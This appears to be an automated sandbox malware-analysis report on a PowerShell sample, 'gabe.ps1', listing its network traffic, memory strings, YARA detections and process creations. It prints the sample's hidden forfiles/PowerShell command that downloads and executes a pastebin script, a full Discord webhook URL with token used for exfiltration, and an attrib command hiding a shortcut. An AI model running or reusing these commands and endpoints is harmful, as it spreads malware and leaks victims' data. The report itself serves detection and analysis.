Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 298Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:06:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008401x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PunADJfgpv3LQ%2BXiq5HP1SYW8L1g2zQi0QLG%2FSZ0%2Fphizn9ucZJdw6EEIT4uI3F57IjW3ofrgKC869pFydhBUF2SrELMgzPqQbuSLeb%2F3qPcWsb2qe8bOQgZGMR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=d40ef3348837f805097580af303a248368f0e26d-1729008400; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=qQi7Wn6Ttgz25nBlGDVFCEQV8zUZbgG72XzpHyUegoY-1729008400416-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d310ec54bcb6bd1-DFW{"message": "Unknown Webhook", "code": 10015}
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:06:53 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008415x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D3leWqN14%2FTPEpUhVQS2W5kgNjg7eNUeIlw8bN8%2FjzlRkCzrp5FYXMwVlnGDxrr67C2voq5M2oDjsvQvRbeo0GQmJSMK9Wh3CZ%2BkyJ3lObSJGFfNhOaMceY4Idpl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=9aa4de5b91cddf0f78aad7617e140b1244fb685a-1729008413; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=HL6qoEi9AUK1QXMCmD6wtLxQOptKFF.UZiBr_yfuJog-1729008413880-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d310f1a0d9be946-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 16:07:02 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729008423x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8de1sjzd5G6xecmQ350B52qWhJI4YwgZvvNiBHoduMzzOpBKOAQSpj5cRxooxa4yrnYTejqW2WestQuMuSBpe7XCUBMkDBk7zxQoRKOhW9vd6%2B7j%2BF1JGU0KdLZg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=dee6a8c890f1452258eff67aae95b99f1a197834-1729008422; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Xcn4G42yntjKFoikxVo6LrIXjEz.GaCtSY.BlUm1KHM-1729008422076-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d310f4d3c922cb2-DFW
Source: powershell.exe, 00000000.00000002.1687945828.0000027108CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D203051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000000.00000002.1713569530.0000027118768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1822947062.000001D2020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D20261C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D2025FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC602A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000C.00000002.1906348884.0000020AC602A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000000.00000002.1687945828.0000027108916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1822947062.000001D202699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000C.00000002.1906348884.0000020AC6379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000000.00000002.1687945828.00000271086F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D201C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC58A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1687945828.0000027108916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1718524560.0000027120920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1687945828.00000271086F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D201BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D201BFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC58CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC58DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1687945828.0000027108916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D203051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000007.00000002.1822947062.000001D203051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6D2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/129575196622756
Source: powershell.exe, 00000007.00000002.1822947062.000001D20272F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM
Source: powershell.exe, 0000000C.00000002.1906348884.0000020AC6454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6318000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6D2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC644A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1966785889.0000020ADDE16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6446000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC642D000.00000004.00000800.00020000.00000000.sdmp, gabe.ps1String found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv
Source: powershell.exe, 00000000.00000002.1687945828.0000027108916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1687945828.0000027109712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D2020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC5D8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1713569530.0000027118768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.1822947062.000001D20260A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000007.00000002.1822947062.000001D20260A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D2025FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000007.00000002.1822947062.000001D202699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000007.00000002.1822947062.000001D202640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D20261C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC62FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49717 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7752.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_1076.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_4084.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1076, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00EE9920_2_00007FF7C00EE992
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00ED7D60_2_00007FF7C00ED7D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00E4C0A0_2_00007FF7C00E4C0A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00F14C50_2_00007FF7C00F14C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00E95FA0_2_00007FF7C00E95FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00E3F550_2_00007FF7C00E3F55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF7C00EE0680_2_00007FF7C00EE068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C00FB9667_2_00007FF7C00FB966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C00FC7127_2_00007FF7C00FC712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C00F492A7_2_00007FF7C00F492A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C00FD1B17_2_00007FF7C00FD1B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C00F54F27_2_00007FF7C00F54F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C010964C7_2_00007FF7C010964C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C0107E777_2_00007FF7C0107E77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF7C01096D57_2_00007FF7C01096D5
Source: amsi64_7752.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_1076.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_4084.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1076, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4084, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal84.troj.evad.winPS1@16/15@4/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crvd5ltm.hg0.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gabe.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
